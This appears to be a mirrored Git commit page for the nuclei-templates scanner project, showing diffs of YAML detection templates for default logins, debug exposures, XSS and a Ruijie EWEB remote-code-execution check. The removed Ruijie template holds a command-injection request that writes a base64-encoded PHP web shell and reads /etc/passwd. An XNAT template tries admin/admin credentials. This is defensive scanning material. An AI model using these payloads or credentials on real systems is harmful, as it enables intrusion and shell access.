daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into add-openbsd-relayd-fingerprint

patch-1
lu4nx 2022-11-02 11:42:35 +08:00
parent 86d6440c9f d83c072a95
commit a99ab1eef5
8 changed files with 91 additions and 52 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.new-additions
View File

@ -1,9 +1,11 @@
default-logins/xnat-default-login.yaml
exposed-panels/allied-telesis-exposure.yaml
exposed-panels/cisco/cisco-anyconnect-vpn.yaml
exposed-panels/connectwise-backup-manager.yaml
exposed-panels/nginx-ui-dashboard.yaml
misconfiguration/debug/ampache-debug.yaml
misconfiguration/debug/github-debug.yaml
misconfiguration/debug/werkzeug-debug.yaml
misconfiguration/healthchecks-ui-exposure.yaml
misconfiguration/installer/ampache-music-installer.yaml
misconfiguration/installer/moodle-installer.yaml

1
.nuclei-ignore
View File

@ -27,6 +27,7 @@ files:
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
- cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml

6
cnvd/2021/CNVD-2021-09650.yaml
View File

@ -1,12 +1,14 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection
author: daffainfo
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0

19
cves/2019/CVE-2019-14696.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14696
cwe-id: CWE-79
tags: packetstorm,cve,cve2019,xss
tags: xss,open-school,packetstorm,cve,cve2019
requests:
- method: GET
@ -24,12 +24,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/08/08

2
default-logins/activemq/activemq-default-login.yaml
View File

@ -3,7 +3,7 @@ id: activemq-default-login
info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
severity: high
description: Apache ActiveMQ default login information was discovered.
reference:
- https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html

42
default-logins/xnat-default-login.yaml Normal file
View File

@ -0,0 +1,42 @@
id: xnat-default-login
info:
name: XNAT Default Login
author: 0x_Akoko
severity: high
description: XNAT default login information (admin/admin) was discovered.
reference:
- https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin
metadata:
verified: true
shodan-query: http.title:"XNAT"
tags: default-login,xnat
requests:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: header
words:
- "app/template/Index.vm?login=true"
- "JSESSIONID"
condition: and
- type: status
status:
- 302

28
misconfiguration/debug/werkzeug-debug.yaml Normal file
View File

@ -0,0 +1,28 @@
id: flask-werkzeug-debug
info:
name: Flask Werkzeug Debugger Exposure
author: DhiyaneshDk
severity: low
metadata:
verified: true
shodan-query: title:"TypeError"
tags: werkzeug,exposure,debug
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'TypeError:'
- 'Werkzeug powered traceback interpreter'
condition: and
- type: status
status:
- 500

43
vulnerabilities/ruijie/ruijie-networks-rce.yaml
View File

@ -1,43 +0,0 @@
id: ruijie-networks-rce
info:
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: pikpikcu
description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
severity: critical
reference:
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: ruijie,rce,network
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00
- |
GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "nobody:x:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03